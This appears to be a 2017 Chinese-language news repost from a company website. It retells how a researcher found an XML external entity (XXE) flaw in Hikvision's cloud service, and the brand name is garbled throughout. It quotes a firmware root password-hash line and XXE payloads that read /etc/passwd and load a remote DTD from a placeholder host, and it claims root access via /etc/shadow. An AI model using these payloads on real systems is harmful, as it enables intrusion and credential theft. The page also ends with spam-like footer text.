<table id="aq0zu"><strong id="aq0zu"><dl id="aq0zu"></dl></strong></table>
    1. <track id="aq0zu"></track>
          <track id="aq0zu"></track>
              1. <pre id="aq0zu"><del id="aq0zu"><menu id="aq0zu"></menu></del></pre>
                當前位置: 首 頁新聞資訊行業動態

                國外黑客發現的??低曔h程系統XXE漏洞分析

                作者:藍海信息技術  來源:本站  發表時間:2017/12/4 19:42:11   瀏覽:

                物聯網發展和安全威脅總是如影隨形。兩個月前,我想研究一下網絡攝像機,然后就在亞馬遜上購買了一個比較便宜的,由??低暣どa的Elisa Live 720p HD IP Camera。當我在破解Elisa攝像機嘗試獲取密碼信息的過程中,卻偶然發現了??低曔h程系統的一個XML外部實體注入漏洞(XXE)。

                XXE InjectionXMLExternal Entity Injection,也就是XML外部實體注入攻擊,漏洞是在對非安全的外部實體數據進?行處理時引發的安全問題。在XML1.0標準里,XML文檔結構?定義了實體(entity)這個概念。實體可以通過預定義在文檔中調用,實體的標識符可訪問本地或遠程內容。如果在這個過程中引入了惡意,在對XML文檔處理后則可能導致信息泄漏等安全問題。具體可參考TSRC-XXE漏洞攻防。

                1 研究開始

                通常來說,大多網絡攝像機數據要被上傳到其后臺系統中,也就是說,只有利用網頁或者app通過其云服務平臺才能訪問攝像機。我通過攝像機以太網接口把其連接到實驗室環境,進行網絡流量監聽。因為一些設備內置了老舊或不安全的固件,所以如果想做物聯網設備相關的實驗,強烈建議不要急于把設備接上互聯網。

                從Wireshark抓包流量中發現了幾個有意思的數據包:

                (1)兩個未加密的請求調用:



                (2)向網站www.hik-online.com發起POST請求的base64加密數據包(后作分析)

                (3)從Amazon S3存儲中下載更新的Get請求:




                2 嘗試破解網絡攝像機

                利用Nmap掃描攝像機,發現了一些開放端口服務,其中包括一個登錄頁面,經嘗試,一些??低暢S玫哪J用戶名和密碼組合無法正確登錄。后來發現,密碼驗證的控制器受http摘要認證機制保護,這是該固件獨有的特點。利用binwalkhiktools對固件進行分析后,雖然沒發現任何摘要認證信息,卻提取到了一些有意思的東西,如/etc/passwd文件和其中的root密碼hiklinux:



                root:ToCOv8qxP13qs:0:0:root:/root/:/bin/sh



                對固件進行升級之后,攝像機的SSH端口就變為關閉狀態了,所以我沒法利用這個點,只能嘗試其它途徑。

                3 發現XXE漏洞

                回到向www.hik-online.com發起請求的數據包,它是一個Base64編碼的POST字符串,解碼之后是一堆亂碼,當然,攝像機用來驗證服務器的密碼可能就在固件中,只是需要時間去分析發現。然而,我從??低暰W站上無意發現了這個:

                如果發現任何漏洞,請聯系HSRC@hikvision.com,請勿對外公開漏洞細節。

                這是一個漏洞懸賞項目,好吧,讓我們來研究研究它的POST請求。由于這是一個XML POST請求,我首先嘗試用SYSTEM entity方法來讓遠程網站引用本地實體文件,如:





                <?xml version=”1.0”?>

                <!DOCTYPE netspi [<!ENTITY a SYSTEM“file:///etc/passwd” >]>

                <c>&b;</c>





                但該方法并不奏效,于是,我利用VPS遠程傳入引用實體,成功了!


                <?xml version=”1.0”?>

                <!DOCTYPE netspi [<!ENTITY a SYSTEM“http://www.xxx.com/test.dtd” >]>

                <c>&b;</c>




                圖:載入外部實體成功

                !這就有意思了,既然我們可以使用SYSTEM entity方式加載引用外部實體,就可以通過惡意dtd文件調用回傳其它網站文件,如/etc/hosts文件等。所有這些過程都可以通過一個好用的自動化工具XXEinjector來完成:



                OK,我可以遠程讀取網站上的任意文件,包括etc/shadow文件,當然也就獲取了這臺服務器的root權限。而且,??低暦植荚谌虻钠渌?/span>API服務器同樣存在該XXE漏洞,最終,如果獲得了這些遠程服務器權限,甚至連shodan上可搜索的大量網絡攝像機都面臨安全風險。

                最新資訊
                • 768網絡即將上線啦,只因有你,未來的網絡更精彩

                  768網絡即將上線啦,只因有你,未來的網絡更精彩768網絡是龍巖市藍海信息技術有限公司前身,未來網絡團隊歷時八年之久項目開發,以高精尖技術壓縮建站成本,以超低價甚至免費享受高端體驗。768網絡的目標!讓每個企業、個體戶、個人擁有自己的網絡名片,網上門頭!讓價格不再是阻礙的門檻!768網絡定于2018年8月8日準時上線,現面向社會各界招收代理商,一起打造網絡轉...

                • 陳氏商城進入后期的調試,即將試上線運營

                  陳氏商城于2015年度曾測試試上線運營,因其處于互聯網+的轉型區,跟不上時代的發展,本公司龍巖市藍海信息技術有限公司成立三年之際,2018年到來之際,載著夢想與希望,我們再次起航,希望與廣大客戶朋友們精誠合作,開創未來新輝煌! 陳氏商城項目團隊已在進行最后的相關測試,涉及穩定性,安全性、壓力線程等測試,俗稱黑白盒測試,敬請期待陳氏商城的再次到來。項目研發歷...

                Contact US

                聯系我們

                ADD

                中國·龍巖

                13959078097 0597-13959078097

                地址:福建省漳平市解放北路139號

                久久ww精品w免费人成
                <table id="aq0zu"><strong id="aq0zu"><dl id="aq0zu"></dl></strong></table>
                1. <track id="aq0zu"></track>
                      <track id="aq0zu"></track>
                          1. <pre id="aq0zu"><del id="aq0zu"><menu id="aq0zu"></menu></del></pre>